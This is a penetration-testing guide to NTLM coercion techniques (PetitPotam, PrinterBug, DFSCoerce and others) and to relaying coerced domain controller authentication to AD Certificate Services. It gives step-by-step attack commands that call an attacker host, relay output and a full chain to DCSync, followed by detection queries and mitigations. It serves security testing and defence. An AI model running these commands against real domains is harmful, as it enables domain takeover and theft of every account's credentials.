Protocol-Based NTLM Coercion & Relay Attacks¶
Overview¶
Unlike file-based coercion (which requires a user to interact with a file), protocol-based coercion abuses Windows RPC and DCOM interfaces to force a machine account to authenticate to an attacker-controlled host — with no user interaction whatsoever. These techniques are especially powerful because:
- They coerce machine accounts (e.g.,
DC01$), which are highly privileged - They're triggered remotely over the network
- When combined with NTLM relay, they lead directly to Domain Admin
The killer combination is: Coerce a Domain Controller → Relay its authentication to AD Certificate Services → Obtain a certificate as the DC → Compromise the domain.
The Coercion Techniques¶
| Technique | RPC Interface | CVE | Auth Required | Status |
|---|---|---|---|---|
| PetitPotam | MS-EFSRPC | CVE-2021-36942 | Unauth (originally) | Partially patched |
| PrinterBug | MS-RPRN (Spooler) | — | Authenticated | Works if Spooler enabled |
| DFSCoerce | MS-DFSNM | — | Authenticated | Works on most DCs |
| ShadowCoerce | MS-FSRVP | — | Authenticated | Patched but often re-enabled |
| RemoteMonologue | DCOM | — | Authenticated | Novel (2025) |
1. PetitPotam (CVE-2021-36942)¶
The Vulnerable Interface¶
PetitPotam abuses the MS-EFSRPC (Encrypting File System Remote Protocol). The EfsRpcOpenFileRaw function (and several others) accepts a file path parameter. If you supply a UNC path pointing to your server, the target machine authenticates to you to "open" that file.
Why It's Dangerous¶
Originally, PetitPotam could be triggered unauthenticated against Domain Controllers via the \pipe\lsarpc named pipe. This meant an attacker with only network access could coerce a DC's machine account authentication.
Execution¶
# Coerce DC01 to authenticate to the attacker (ATTACKER_IP)
python3 PetitPotam.py -u '' -p '' ATTACKER_IP DC01_IP
# Authenticated version (if unauth is patched)
python3 PetitPotam.py -u user -p password -d domain.local ATTACKER_IP DC01_IP
Vulnerable Functions¶
Microsoft patched some functions but others remain abusable:
EfsRpcOpenFileRaw(patched)EfsRpcEncryptFileSrvEfsRpcDecryptFileSrvEfsRpcQueryUsersOnFileEfsRpcAddUsersToFile
Status¶
CVE-2021-36942 addressed the unauthenticated lsarpc path, but authenticated coercion via other EFSRPC functions still works on many systems. Additional pipes (\pipe\efsrpc) may still allow it.
2. PrinterBug / SpoolSample (MS-RPRN)¶
The Vulnerable Interface¶
The Windows Print Spooler service exposes MS-RPRN. The RpcRemoteFindFirstPrinterChangeNotificationEx function allows a client to register for print notifications — and specify a UNC path where notifications should be sent. The Spooler authenticates to that path.
Execution¶
# Impacket
python3 dementor.py -u user -p password -d domain.local ATTACKER_IP DC01_IP
# Or SpoolSample (Windows/.NET)
SpoolSample.exe DC01 ATTACKER_HOST
Requirements¶
- The Print Spooler service must be running on the target (it's on by default on many DCs)
- Authenticated (any domain user)
Status¶
Still works wherever the Spooler service is enabled. Microsoft's mitigation is simply to disable the Print Spooler on Domain Controllers — which many organizations have now done in response to PrintNightmare.
3. DFSCoerce (MS-DFSNM)¶
The Vulnerable Interface¶
DFSCoerce abuses MS-DFSNM (Distributed File System Namespace Management Protocol). The NetrDfsAddStdRoot and NetrDfsRemoveStdRoot functions can be abused to coerce authentication.
Execution¶
Why It Matters¶
The DFS service is almost always running on Domain Controllers and is much harder to disable than the Print Spooler (it's core to AD file replication). This makes DFSCoerce one of the most reliable coercion methods.
Status¶
Works on most Domain Controllers. Very difficult to mitigate without breaking DFS functionality.
4. ShadowCoerce (MS-FSRVP)¶
The Vulnerable Interface¶
ShadowCoerce abuses MS-FSRVP (File Server Remote VSS Protocol). The IsPathSupported and IsPathShadowCopied functions accept UNC paths and trigger authentication.
Execution¶
Status¶
Microsoft patched this, but the FSRVP service is often re-enabled by backup software or specific configurations. Worth testing on any target.
5. RemoteMonologue (DCOM — 2025)¶
The Technique¶
Disclosed by IBM X-Force in 2025, RemoteMonologue weaponizes DCOM for NTLM coercion. Instead of RPC named pipes, it abuses DCOM object activation to coerce authentication. It targets DCOM objects like the ServerDataCollectorSet and FileSystemImage interfaces.
Why It's Significant¶
As Microsoft hardens RPC-based coercion (PetitPotam, etc.), DCOM offers a fresh, less-monitored attack surface. RemoteMonologue also leverages the technique to coerce authentication in the context of interactive sessions, potentially capturing more privileged hashes.
Status¶
Novel technique (2025). Detection and mitigation are still maturing across the industry.
6. Coercer — Automated Multi-Protocol Coercion¶
Rather than testing each technique manually, Coercer automates all known coercion methods:
# Scan a target for all vulnerable coercion methods
coercer scan -u user -p password -d domain.local -t DC01_IP
# Coerce using ALL available methods
coercer coerce -u user -p password -d domain.local -t DC01_IP -l ATTACKER_IP
Coercer tests MS-EFSRPC, MS-RPRN, MS-DFSNM, MS-FSRVP, and more in a single run.
GitHub: github.com/p0dalirius/Coercer
The Killer Chain: PetitPotam → ADCS → Domain Admin (ESC8)¶
This is the most impactful use of coercion. If the target domain runs AD Certificate Services (ADCS) with the Web Enrollment endpoint enabled (very common), you can achieve full domain compromise.
Why It Works¶
ADCS Web Enrollment (http://ca/certsrv/) accepts NTLM authentication and does not enforce Extended Protection for Authentication (EPA) by default. This means you can relay coerced NTLM authentication to it. If you relay a Domain Controller's machine account and request a certificate, you get a certificate that authenticates AS the DC — which lets you DCSync the entire domain.
The Attack Flow¶
sequenceDiagram
participant Attacker as 🔴 Attacker
participant Relay as ntlmrelayx<br/>(--adcs)
participant DC as 🖥️ Domain Controller<br/>(DC01$)
participant CA as 📜 ADCS Web Enrollment<br/>(certsrv)
Note over Attacker,Relay: Step 1: Start relay targeting ADCS
Attacker->>Relay: ntlmrelayx -t http://ca/certsrv/certfnsh.asp --adcs
Note over Attacker,DC: Step 2: Coerce the DC
Attacker->>DC: PetitPotam (coerce auth to attacker)
DC->>Relay: NTLM Auth (DC01$ machine account)
Note over Relay,CA: Step 3: Relay to ADCS
Relay->>CA: Request cert as DC01$ (DomainController template)
CA-->>Relay: Certificate issued for DC01$
Relay-->>Attacker: Base64 certificate (PFX)
Note over Attacker: Step 4: Use cert to get TGT
Attacker->>DC: Rubeus asktgt with DC01$ cert
DC-->>Attacker: TGT for DC01$
Note over Attacker: Step 5: DCSync
Attacker->>DC: DCSync (using DC machine account privileges)
DC-->>Attacker: 🎯 All domain hashes (incl. krbtgt)
Step-by-Step Commands¶
Step 1 — Set up the relay targeting ADCS:
ntlmrelayx.py -t http://ca01.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
Step 2 — Coerce the Domain Controller:
python3 PetitPotam.py -u '' -p '' ATTACKER_IP DC01_IP
# Or if patched, use DFSCoerce:
python3 dfscoerce.py -u lowpriv -p password -d corp.local ATTACKER_IP DC01_IP
Step 3 — ntlmrelayx captures the cert:
[*] Authenticating against http://ca01.corp.local as CORP/DC01$ SUCCEED
[*] GOT CERTIFICATE! ID 42
[*] Base64 certificate of user DC01$:
MIIStQIBAzCCEn8GCSqGSIb3DQ...
Step 4 — Request a TGT using the certificate:
# Using the captured PFX certificate
python3 gettgtpkinit.py -cert-pfx dc01.pfx corp.local/DC01\$ dc01.ccache
# Or with Rubeus on Windows
Rubeus.exe asktgt /user:DC01$ /certificate:dc01.pfx /ptt
Step 5 — DCSync the domain:
Result: Every password hash in the domain, including the krbtgt hash (which enables Golden Tickets for permanent persistence).
Alternative Relay Targets¶
Coerced authentication can be relayed to targets other than ADCS:
Relay to LDAP/LDAPS (RBCD Attack)¶
# Relay to LDAP and configure Resource-Based Constrained Delegation
ntlmrelayx.py -t ldaps://dc01.corp.local --delegate-access --no-dump
This grants an attacker-controlled computer account delegation rights over the coerced machine, allowing impersonation of any user on it.
Relay to SMB (if signing disabled)¶
# Relay to another machine's SMB (requires SMB signing NOT enforced)
ntlmrelayx.py -t smb://192.168.1.50 -smb2support -c "whoami"
WebDAV Trick — Forcing HTTP Authentication¶
A limitation of relaying is that SMB→LDAP relay is often blocked by signing. The WebDAV trick forces the coercion to use HTTP instead of SMB, which enables more relay targets:
# Coerce with a WebDAV path (@ syntax forces HTTP/WebDAV)
python3 PetitPotam.py ATTACKER_IP@80/share DC01_IP
This requires the WebClient service to be running on the target (can be started remotely via techniques like the searchConnector-ms trick).
Detection & Monitoring¶
Coercion Detection¶
| Indicator | Detection Method |
|---|---|
| Inbound RPC to EFSRPC/RPRN/DFSNM/FSRVP | Network monitoring on DC |
| Machine account auth to non-standard hosts | Event ID 4624 (logon type 3) with computer accounts |
| Rapid cert enrollment for machine accounts | ADCS audit logs (Event ID 4886, 4887) |
| Unusual DCSync (replication) requests | Event ID 4662 with replication GUIDs |
ADCS Relay Detection¶
SecurityEvent
| where EventID == 4887 // Certificate Services approved a request
| where RequesterName endswith "$" // Machine account requesting cert
| where CertificateTemplate in ("DomainController", "Machine")
| project TimeGenerated, RequesterName, CertificateTemplate, Requester
Mitigations¶
1. Enable Extended Protection for Authentication (EPA) on ADCS¶
This is the single most important fix for the ESC8 chain:
IIS Manager → certsrv → Authentication → Windows Authentication →
Advanced Settings → Extended Protection: Required
2. Enforce HTTPS + Channel Binding on ADCS Web Enrollment¶
Disable HTTP; require HTTPS with channel binding to prevent relay.
3. Disable NTLM Where Possible¶
Use the Network security: Restrict NTLM group policies to block NTLM authentication to ADCS and other sensitive services.
4. Enable SMB Signing and LDAP Signing¶
- Enforce SMB signing (prevents SMB relay)
- Enforce LDAP signing + channel binding (prevents LDAP relay)
5. Disable Unnecessary Services¶
- Disable Print Spooler on Domain Controllers (kills PrinterBug)
- Disable the WebClient service where not needed (kills WebDAV trick)
6. Restrict RPC Coercion¶
Deploy RPC filters to block the coercion interfaces:
netsh rpc filter add rule layer=um actiontype=block
netsh rpc filter add condition field=if_uuid matchtype=equal data=c681d488-d850-11d0-8c52-00c04fd90f7e # EFSRPC
netsh rpc filter add filter
7. Harden ADCS Templates¶
Remove the ability for machine accounts to enroll in authentication-capable certificate templates unless strictly required.
Tools Reference¶
| Tool | Purpose |
|---|---|
| PetitPotam.py | MS-EFSRPC coercion |
| dementor.py / SpoolSample | MS-RPRN (PrinterBug) coercion |
| dfscoerce.py | MS-DFSNM coercion |
| shadowcoerce.py | MS-FSRVP coercion |
| Coercer | Automated multi-protocol coercion |
| ntlmrelayx.py | NTLM relay to SMB/LDAP/HTTP/ADCS |
| Certipy | ADCS attack automation (incl. relay) |
| gettgtpkinit.py | Request TGT from certificate |
| Rubeus | Windows Kerberos abuse (cert → TGT) |
References¶
- IBM X-Force — RemoteMonologue: Weaponizing DCOM
- Coercer — p0dalirius
- SpecterOps — Certified Pre-Owned (ADCS attacks)
- HackTricks — Force NTLM Privileged Authentication